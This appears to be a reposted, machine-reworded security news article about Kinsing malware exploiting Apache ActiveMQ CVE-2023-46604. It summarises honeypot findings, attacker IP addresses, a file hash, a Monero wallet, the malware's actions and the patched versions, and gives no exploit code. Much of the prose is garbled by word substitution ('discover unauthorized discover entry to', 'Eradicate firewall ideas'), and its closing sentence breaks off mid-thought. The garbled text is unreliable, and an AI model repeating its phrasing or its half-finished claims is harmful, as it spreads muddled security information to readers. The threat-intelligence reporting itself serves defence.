Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers
Possibility actors actively focused the Apache ActiveMQ vulnerability to discover unauthorized discover entry to to messaging systems, ensuing in capability information breaches and plot compromise.
Meanwhile, the Apache ActiveMQ vulnerability, which became once tracked as “CVE-2023-46604,” will also be exploited to disrupt verbal exchange, trigger carrier outages, and deploy ransomware (HelloKitty) as effectively.
Cybersecurity researchers at Sekoia right this moment identified that the Kinsing Malware actively exploited this Apache ActiveMQ vulnerability (CVE-2023-46604) to assault the Linux server.
Apache ActiveMQ Vulnerability Exploited
This vulnerability became once disclosed on October 27, 2023; it’s a severe OpenWire module vulnerability with a severe CVSS3 receive of 9.8. This flaw lets in unauthenticated attackers to manufacture code.
The flaw, rooted in deserialization validation lapses, in particular impacts ExceptionResponseMarshaller. Attackers can exploit it by making a weaponized throwable class.
ClassPathXmlApplicationContext will also be manipulated thru a weaponized XML file, granting code execution. Metasploit and identical PoCs leverage this flaw.
Patches were launched on October 28, 2023, urging updates to the following variations:-
- 5.15.16
- 5.16.7
- 5.17.6
- 5.18.3
If updating isn’t doubtless, then invent clear that to block the OpenWire discover entry to from the Net, as this can mitigate the probability.
Researchers deployed honeypots globally the utilization of ActiveMQ v5.17.5. Monitored host with Sekoia Linux agent and Suricata IDS.
Honeypots were active since 9 Nov 2023, and the main Kinsing intrusion became once tracked on 11 Nov. Day-to-day 2-3 Kinsing intrusions were recorded since 12 Nov, and the assaults were completed from the following two IP addresses:-
- 109.237.96[.]124
- 78.153.140[.]30
Actions Performed by Kinsing Malware
Here below, we have talked about the total actions that are conducted by the Kinsing malware:-
- Rootkit
- Eradicate competitors
- Download and manufacture
- Place persistence
- Eradicate firewall ideas
- Deletes competitors
- Sets up a crontab
Kinsing malware characteristics
Here below, we have talked about the total characteristics of the Kinsing malware:-
- SHA256 hash: 787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
- Dimension: 5.69 MBytes
- File: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
- Compiler: Go1.17.13
Capabilities
The malware code contains over 60 functions, and below we have talked a number of few of them:-
- getActiveC2Url
- POST on /mu
- POST on /ki
- GET on /discover
- massscan
- redisBrute
The cryptominer that’s deployed is XMRig, and the UPX-packed with config runt print. Decompressed, it unearths a Monero wallet (46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb) and nanopool.org URL.
Nonetheless, this wallet has been idle since Nov 2019. The CTI Experiences link this wallet to Kinsing, nonetheless it’s.
The quite a number of breaches highlight how well-known it is to apply security updates rapid and retain strict preserve watch over over historical functions, in particular in dockerized companies.
Source credit : cybersecuritynews.com